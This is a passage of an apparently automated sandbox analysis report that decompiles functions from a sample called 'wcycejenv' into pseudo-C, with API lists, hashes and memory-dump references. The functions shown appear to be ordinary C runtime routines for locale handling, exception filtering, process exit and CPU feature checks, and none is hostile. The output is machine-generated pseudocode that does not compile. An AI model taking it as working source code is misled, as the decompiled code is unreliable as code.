				if(_t56 == 0) {
					L37:
					 *_t124 = 0;
					_t58 = 1;
					__eflags = 1;
					L38:
					return E004085C2(_t58, _t94, _v8 ^ _t127, _t121, _t124, _t126);
				}
				if(E0042B692(_t124, _t126,  *((intOrPtr*)(_t94 + 0x54)),  &_v248) != 0) {
					L16:
					if(( *_t124 & 0x00000300) == 0x300) {
						L36:
						_t58 =  !( *_t124 >> 2) & 0x00000001;
						goto L38;
					}
					asm("sbb eax, eax");
					if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
						goto L37;
					}
					_t74 = E0042B692(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
					if(_t74 != 0) {
						__eflags =  *(_t94 + 0x60);
						if( *(_t94 + 0x60) != 0) {
							goto L36;
						}
						__eflags =  *(_t94 + 0x5c);
						if( *(_t94 + 0x5c) == 0) {
							goto L36;
						}
						__eflags = E0042B692(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
						if(__eflags != 0) {
							goto L36;
						}
						_push(_t124);
						_t94 = 0;
						_t78 = E00436A21(__eflags, _t126, 0);
						__eflags = _t78;
						if(_t78 == 0) {
							goto L36;
						}
						 *_t124 =  *_t124 | 0x00000100;
						__eflags = _t124[1];
						L34:
						if(_t141 == 0) {
							_t124[1] = _t126;
						}
						goto L36;
					}
					_t111 =  *_t124 | 0x00000200;
					 *_t124 = _t111;
					if( *(_t94 + 0x60) == _t74) {
						__eflags =  *(_t94 + 0x5c) - _t74;
						if( *(_t94 + 0x5c) == _t74) {
							goto L20;
						}
						_t122 =  *((intOrPtr*)(_t94 + 0x50));
						_v256 = _t122 + 2;
						do {
							_t80 =  *_t122;
							_t122 = _t122 + 2;
							__eflags = _t80 - _v252;
						} while (_t80 != _v252);
						_t121 = _t122 - _v256 >> 1;
						__eflags = _t122 - _v256 >> 1 -  *(_t94 + 0x5c);
						if(__eflags != 0) {
							_t74 = 0;
							goto L20;
						}
						_push(_t124);
						_t81 = E00436A21(__eflags, _t126, 1);
						__eflags = _t81;
						if(_t81 == 0) {
							goto L36;
						}
						 *_t124 =  *_t124 | 0x00000100;
						_t74 = 0;
						L21:
						_t141 = _t124[1] - _t74;
						goto L34;
					}
					L20:
					 *_t124 = _t111 | 0x00000100;
					goto L21;
				}
				asm("sbb eax, eax");
				if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
					goto L37;
				}
				_t89 = E0042B692(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
				_t115 =  *_t124;
				if(_t89 != 0) {
					__eflags = _t115 & 0x00000002;
					if((_t115 & 0x00000002) != 0) {
						goto L16;
					}
					__eflags =  *(_t94 + 0x5c);
					if( *(_t94 + 0x5c) == 0) {
						L12:
						_t121 =  *_t124;
						__eflags = _t121 & 0x00000001;
						if((_t121 & 0x00000001) != 0) {
							goto L16;
						}
						_t90 = E004369FC(_t126);
						__eflags = _t90;
						if(_t90 == 0) {
							goto L16;
						}
						_t121 = _t121 | 0x00000001;
						__eflags = _t121;
						 *_t124 = _t121;
						goto L15;
					}
					_t92 = E0042B7E2(_t94, _t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248,  *(_t94 + 0x5c));
					_t128 = _t128 + 0xc;
					__eflags = _t92;
					if(_t92 != 0) {
						goto L12;
					}
					 *_t124 =  *_t124 | 0x00000002;
					__eflags =  *_t124;
					_t124[2] = _t126;
					_t117 =  *((intOrPtr*)(_t94 + 0x50));
					_t121 = _t117 + 2;
					do {
						_t93 =  *_t117;
						_t117 = _t117 + 2;
						__eflags = _t93 - _v252;
					} while (_t93 != _v252);
					__eflags = _t117 - _t121 >> 1 -  *(_t94 + 0x5c);
					if(_t117 - _t121 >> 1 ==  *(_t94 + 0x5c)) {
						_t124[1] = _t126;
					}
				} else {
					_t124[1] = _t126;
					 *_t124 = _t115 | 0x00000304;
					L15:
					_t124[2] = _t126;
				}
			}

0x004365a2
0x004365ad
0x004365b4
0x004365c2
0x004365ca
0x004365d9
0x004365e5
0x004365f6
0x004365fc
0x00436605
0x004367df
0x004367e1
0x004367e3
0x004367e3
0x004367e4
0x004367f2
0x004367f2
0x0043661e
0x004366d9
0x004366e4
0x004367d3
0x004367da
0x00000000
0x004367da
0x004366f8
0x0043670e
0x00000000
0x00000000
0x0043671e
0x00436727
0x00436795
0x00436798
0x00000000
0x00000000
0x0043679a
0x0043679d
0x00000000
0x00000000
0x004367b0
0x004367b2
0x00000000
0x00000000
0x004367b4
0x004367b5
0x004367b9
0x004367c1
0x004367c3
0x00000000
0x00000000
0x004367c5
0x004367cb
0x004367ce
0x004367ce
0x004367d0
0x004367d0
0x00000000
0x004367ce
0x0043672b
0x00436731
0x00436736
0x00436748
0x0043674b
0x00000000
0x00000000
0x0043674d
0x00436753
0x00436759
0x00436759
0x0043675c
0x0043675f
0x0043675f
0x0043676e
0x00436770
0x00436773
0x0043678f
0x00000000
0x0043678f
0x00436775
0x00436779
0x00436781
0x00436783
0x00000000
0x00000000
0x00436785
0x0043678b
0x00436740
0x00436740
0x00000000
0x00436740
0x00436738
0x0043673e
0x00000000
0x0043673e
0x00436632
0x00436648
0x00000000
0x00000000
0x00436658
0x0043665f
0x00436663
0x00436672
0x00436675
0x00000000
0x00000000
0x00436677
0x0043667b
0x004366bf
0x004366bf
0x004366c1
0x004366c4
0x00000000
0x00000000
0x004366c7
0x004366cd
0x004366cf
0x00000000
0x00000000
0x004366d1
0x004366d1
0x004366d4
0x00000000
0x004366d4
0x0043668a
0x0043668f
0x00436692
0x00436694
0x00000000
0x00000000
0x00436696
0x00436696
0x00436699
0x0043669c
0x0043669f
0x004366a2
0x004366a2
0x004366a5
0x004366a8
0x004366a8
0x004366b5
0x004366b8
0x004366ba
0x004366ba
0x00436665
0x0043666b
0x0043666e
0x004366d6
0x004366d6
0x004366d6

APIs

Part of subcall function 0042DA10: GetLastError.KERNEL32(?,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DA15
Part of subcall function 0042DA10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DAB3

Part of subcall function 0042DA10: _free.LIBCMT ref: 0042DA72
Part of subcall function 0042DA10: _free.LIBCMT ref: 0042DAA8

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004365F6
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00436640
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00436706

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: 748030b895fc1c77de18050848e295d04211c78ab96354996831c7c79acf86e6
Instruction ID: d1a0455136bcf76c551084a3f5e553d9fccdc5fe94f9a175adc1e5668a9c3c60
Opcode Fuzzy Hash: 748030b895fc1c77de18050848e295d04211c78ab96354996831c7c79acf86e6
Instruction Fuzzy Hash: FC61C071500227ABDB289F29CC82BAB73A8EF08354F51D17BE905C6685F73CD941DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0042BE3E Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E0042BE3E(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x454264; // 0x8c4320d5
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00408192(_t41);
					_pop(_t61);
				}
				E004097A0(_t66,  &_v804, 0, 0x50);
				E004097A0(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00408192(_t57);
				}
				return E004085C2(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x0042be3e
0x0042be3e
0x0042be3e
0x0042be49
0x0042be4e
0x0042be50
0x0042be58
0x0042be5a
0x0042be5d
0x0042be62
0x0042be62
0x0042be6e
0x0042be81
0x0042be8f
0x0042be95
0x0042be9b
0x0042bea1
0x0042bea7
0x0042bead
0x0042beb3
0x0042beb9
0x0042bebf
0x0042bec5
0x0042becc
0x0042bed3
0x0042beda
0x0042bee1
0x0042bee8
0x0042beef
0x0042bef0
0x0042bef9
0x0042beff
0x0042bf02
0x0042bf08
0x0042bf15
0x0042bf1e
0x0042bf27
0x0042bf30
0x0042bf3e
0x0042bf40
0x0042bf55
0x0042bf61
0x0042bf64
0x0042bf69
0x0042bf76

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042BF36
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042BF40
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042BF4D

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: ac679e09188070244ff664ed99481819ed2686b0b958e3b0823a3b171ce31dab
Instruction ID: 42181474e79ea472f16c3d86e7bc51bf63b67072b1bb00e58619997267a0a5b6
Opcode Fuzzy Hash: ac679e09188070244ff664ed99481819ed2686b0b958e3b0823a3b171ce31dab
Instruction Fuzzy Hash: D731B575901329ABCB21DF29DD8978DB7B4BF18310F5041EAE41CA7291EB749F818F48

Uniqueness

Uniqueness Score: -1.00%

Function 00428A12 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00428A12(int _a4) {
				void* _t14;

				if(E00433B3C(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00428AC2(_t14, _a4);
				ExitProcess(_a4);
			}

0x00428a1f
0x00428a3b
0x00428a3b
0x00428a44
0x00428a4d

APIs

GetCurrentProcess.KERNEL32(?,?,00428A11,?,?,?,?,?,00416B39), ref: 00428A34
TerminateProcess.KERNEL32(00000000,?,00428A11,?,?,?,?,?,00416B39), ref: 00428A3B
ExitProcess.KERNEL32 ref: 00428A4D

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: e2aac983247d7fd41df62f717d1c7289af9ec923848dd391f8b5d795ce9cdd57
Instruction ID: 7ae1b2d27404ecc4df336a1c311ee112ae698d09d91775a746cfc50f2621a911
Opcode Fuzzy Hash: e2aac983247d7fd41df62f717d1c7289af9ec923848dd391f8b5d795ce9cdd57
Instruction Fuzzy Hash: A9E04635201118ABCF216F64EC48A8E3B28EB45351F40402AF80686632CF3AED81DA48

Uniqueness

Uniqueness Score: -1.00%

Function 004083E2 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004083E2(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t104;

				_t90 = __edx;
				 *0x455c9c =  *0x455c9c & 0x00000000;
				 *0x454260 =  *0x454260 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0x455ca0;
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x455ca0 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x454260; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x455c9c = 1;
					 *0x454260 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x455c9c = 2;
						 *0x454260 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x454260; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x455c9c = 3;
								 *0x454260 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x455c9c = 5;
									 *0x454260 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x454260 =  *0x454260 | 0x00000040;
										 *0x455c9c = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t96 =  *0x455ca0 | 0x00000001;
					 *0x455ca0 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x004083e2
0x004083e5
0x004083ef
0x00408400
0x004085b2
0x004085b5
0x004085b5
0x00408406
0x0040840c
0x00408411
0x00408415
0x00408419
0x0040841b
0x0040841d
0x00408420
0x00408425
0x0040842e
0x0040843f
0x0040844a
0x00408450
0x00408451
0x00408457
0x0040845a
0x00408464
0x00408467
0x0040846a
0x0040846d
0x004084b2
0x004084b2
0x004084b8
0x004084b8
0x004084bd
0x004084be
0x004084c4
0x004084f6
0x004084c6
0x004084c8
0x004084c9
0x004084cf
0x004084d2
0x004084d4
0x004084d7
0x004084da
0x004084dd
0x004084e0
0x004084e9
0x004084ee
0x004084ee
0x004084e9
0x004084f9
0x004084fe
0x00408501
0x0040850b
0x00408516
0x0040851c
0x0040851f
0x00408529
0x00408534
0x00408540
0x00408543
0x00408546
0x00408551
0x00408556
0x00408558
0x0040855d
0x00408560
0x0040856a
0x00408572
0x00408577
0x00408581
0x0040858f
0x004085a2
0x004085a9
0x004085a9
0x0040858f
0x00408572
0x00408556
0x00408534
0x00000000
0x004085b1
0x00408472
0x0040847c
0x004084a7
0x004084aa
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004083F8

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 8dd0bbaffafb5431f2adff5c5255dd532adc9112d9c60b345a30beeb225a5502
Instruction ID: d0c2e6ba600212f81eff0bf26aa36a061a3169af2288bbf0e84f86d2f30b913c
Opcode Fuzzy Hash: 8dd0bbaffafb5431f2adff5c5255dd532adc9112d9c60b345a30beeb225a5502
Instruction Fuzzy Hash: 465177B19107198FEB15CF55E9817AABBF0FB84315F10807AD445EB391DB78E940CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004367F5 Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004367F5(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t15;
				signed int _t21;
				signed int _t23;
				signed int _t30;
				signed int _t31;
				void* _t32;
				signed int _t41;
				signed int* _t47;
				int _t49;
				signed int _t50;

				_t46 = __edx;
				_t15 =  *0x454264; // 0x8c4320d5
				_v8 = _t15 ^ _t50;
				_t32 = E0042DA10(__ecx, __edx);
				_t47 =  *(E0042DA10(__ecx, __edx) + 0x34c);
				_t49 = E004368CA(_a4);
				asm("sbb ecx, ecx");
				_t21 = GetLocaleInfoW(_t49, ( ~( *(_t32 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
				if(_t21 != 0) {
					_t23 = E0042B692(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
					_t41 =  *(_t32 + 0x60);
					__eflags = _t23;
					if(_t23 != 0) {
						__eflags = _t41;
						if(_t41 == 0) {
							__eflags =  *((intOrPtr*)(_t32 + 0x5c)) - _t41;
							if( *((intOrPtr*)(_t32 + 0x5c)) != _t41) {
								_t30 = E0042B692(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
								__eflags = _t30;
								if(__eflags == 0) {
									_push(_t47);
									_push(_t30);
									goto L9;
								}
							}
						}
					} else {
						__eflags = _t41;
						if(__eflags != 0) {
							L10:
							 *_t47 =  *_t47 | 0x00000004;
							__eflags =  *_t47;
							_t47[1] = _t49;
							_t47[2] = _t49;
						} else {
							_push(_t47);
							_push(1);
							L9:
							_push(_t49);
							_t31 = E00436A21(__eflags);
							__eflags = _t31;
							if(_t31 != 0) {
								goto L10;
							}
						}
					}
					_t27 =  !( *_t47 >> 2) & 0x00000001;
					__eflags =  !( *_t47 >> 2) & 0x00000001;
				} else {
					 *_t47 =  *_t47 & _t21;
					_t27 = _t21 + 1;
				}
				return E004085C2(_t27, _t32, _v8 ^ _t50, _t46, _t47, _t49);
			}

0x004367f5
0x00436800
0x00436807
0x00436815
0x0043681d
0x0043682c
0x00436838
0x00436849
0x00436851
0x00436862
0x00436869
0x0043686c
0x0043686e
0x00436879
0x0043687b
0x0043687d
0x00436880
0x0043688c
0x00436893
0x00436895
0x00436897
0x00436898
0x00000000
0x00436898
0x00436895
0x00436880
0x00436870
0x00436870
0x00436872
0x004368a6
0x004368a6
0x004368a6
0x004368a9
0x004368ac
0x00436874
0x00436874
0x00436875
0x00436899
0x00436899
0x0043689a
0x004368a2
0x004368a4
0x00000000
0x00000000
0x004368a4
0x00436872
0x004368b6
0x004368b6
0x00436853
0x00436853
0x00436855
0x00436855
0x004368c7

APIs

Part of subcall function 0042DA10: GetLastError.KERNEL32(?,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DA15
Part of subcall function 0042DA10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DAB3

Part of subcall function 0042DA10: _free.LIBCMT ref: 0042DA72
Part of subcall function 0042DA10: _free.LIBCMT ref: 0042DAA8

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00436849

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: a471c6d53f463dfe01ad78ec952845fd15cb368c7f30a974964cfb36407a1016
Instruction ID: 7db91e75b8dd609b5ac46f4a90555a0c16e6ff8d4403a986c9269df1fb1c8db0
Opcode Fuzzy Hash: a471c6d53f463dfe01ad78ec952845fd15cb368c7f30a974964cfb36407a1016
Instruction Fuzzy Hash: EE21A171611217BBDF28AA15DC42ABB73A8EF4C314F11907FFD02D6241EB38ED418A58

Uniqueness

Uniqueness Score: -1.00%

Function 0043647C Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0043647C(void* __ecx, void* __edx, void* __eflags, signed int* _a4) {
				void* __ebp;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				intOrPtr* _t38;
				intOrPtr* _t41;
				signed int _t47;
				void* _t50;
				void* _t51;
				signed int* _t52;
				void* _t53;
				signed int _t62;

				_t53 = E0042DA10(__ecx, __edx);
				_t47 = 2;
				_t38 =  *((intOrPtr*)(_t53 + 0x50));
				_t50 = _t38 + 2;
				do {
					_t26 =  *_t38;
					_t38 = _t38 + _t47;
				} while (_t26 != 0);
				_t41 =  *((intOrPtr*)(_t53 + 0x54));
				 *(_t53 + 0x60) = 0 | _t38 - _t50 >> 0x00000001 == 0x00000003;
				_t51 = _t41 + 2;
				do {
					_t29 =  *_t41;
					_t41 = _t41 + _t47;
				} while (_t29 != 0);
				_t52 = _a4;
				 *(_t53 + 0x64) = 0 | _t41 - _t51 >> 0x00000001 == 0x00000003;
				_t52[1] = 0;
				if( *(_t53 + 0x60) == 0) {
					_t47 = E00436576( *((intOrPtr*)(_t53 + 0x50)));
				}
				 *(_t53 + 0x5c) = _t47;
				_t32 = EnumSystemLocalesW(E004365A2, 1);
				_t62 =  *_t52 & 0x00000007;
				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t47 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t52 = 0;
					return _t34;
				}
				return _t34;
			}

0x00436489
0x0043648f
0x00436490
0x00436493
0x00436496
0x00436496
0x00436499
0x0043649b
0x004364a9
0x004364af
0x004364b2
0x004364b5
0x004364b5
0x004364b8
0x004364ba
0x004364c3
0x004364ce
0x004364d1
0x004364d7
0x004364e2
0x004364e2
0x004364eb
0x004364ee
0x004364f6
0x004364fc
0x00436500
0x00436505
0x00436509
0x0043650e
0x00436510
0x00000000
0x00436510
0x00436516

APIs

Part of subcall function 0042DA10: GetLastError.KERNEL32(?,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DA15
Part of subcall function 0042DA10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DAB3

EnumSystemLocalesW.KERNEL32(004365A2,00000001,00000000,?,-00000050,?,00436BD0,00000000,?,?,?,00000055,?), ref: 004364EE

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 6631004e80f1e44781b39d225986d94d6cd7cdcc3178bfabad2d97d06cc63e1b
Instruction ID: 93320c1fbd991175f14792883b82e9ae6ab39f2c56be3f0371deaf2021983d70
Opcode Fuzzy Hash: 6631004e80f1e44781b39d225986d94d6cd7cdcc3178bfabad2d97d06cc63e1b
Instruction Fuzzy Hash: 79110636600302AFDB189F39D89157AB791FF84318B15843EE58747B40D375A942C748

Uniqueness

Uniqueness Score: -1.00%

Function 00430A14 Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00430A14(void* __ecx, void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				int _t8;
				signed int _t11;
				void* _t14;
				signed int _t17;
